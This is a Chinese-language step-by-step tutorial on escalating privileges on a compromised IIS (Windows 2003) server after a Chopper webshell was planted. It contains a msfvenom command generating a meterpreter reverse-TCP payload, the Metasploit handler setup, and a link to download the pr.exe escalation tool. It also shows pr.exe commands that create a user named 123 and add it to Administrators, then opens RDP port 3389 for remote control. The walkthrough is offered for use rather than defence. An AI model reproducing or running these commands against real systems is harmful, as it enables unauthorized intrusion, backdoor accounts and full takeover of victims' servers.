工具链接:http://链接:https://pan.baidu.com/s/12Aa5atjsl38I59JDbETLzg 提取码:7kb5
我们在用菜刀链接到服务器(iis)时 通常会发现权限很低
kali木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.xxx.xxx lport=4444 -f exe -o hack.exe
木马在当前目录生成了
我们用iis中间件举例子 访问木马 然后用菜刀连接
连接成功后 我们打开虚拟终端 执行基本命令 发现权限不够
原因是iis中间件 可以访问的匿名用户如图所示(每个人的不一样)
而能执行操作系统cmd.exe用户里面 没有这个匿名用户 所以菜刀连接之后 就没权限
需要我们找一个同版本(2003)同位数(32位)的cmd.exe 上传到菜刀 通过命令切换成有权限的cmd 执行setp C:\wmpub\cmd.exe(路径)之所以选择这个目录 是因为这个目录有读写的权限
现在具有普通用户的权限了
接着我们进行下一步 将木马传到物理机桌面 然后在放到菜刀里面
然后我们打开kali 执行msfconsole 创建监听
use exploit/multi/handler #使用攻击模块
set payload windows/meterpreter/reverse_tcp #设置反向代理
set LHOST 192.168.xxx.xxx #设定本地ip监听 也就是kali本机ip
show options #查看配置选项
有yes的地方是需要我们配置的
然后exploit 或者 run
我们将目录切换后 直接执行hack.exe 然后看到shell反弹过来了
我们查看权限发现和菜刀一样
尝试提权 第一种 直接用 getsystem命令
看到红色的部分就说明提权失败了
接着我们用我上面提供的提权工具 先把工具上传到菜刀目录
然后执行命令
pr.exe "whoami"
pr.exe "net user 123 123 /add" #创建用户
pr.exe "net localgroup Administrators 123 /add" #将创建用户添加到管理员组
查看当前用户
创建用户
添加进用户组
现在我们尝试打开对方的3389端口 然后进行远程桌面控制
输入刚建好的用户进行登录 登录成功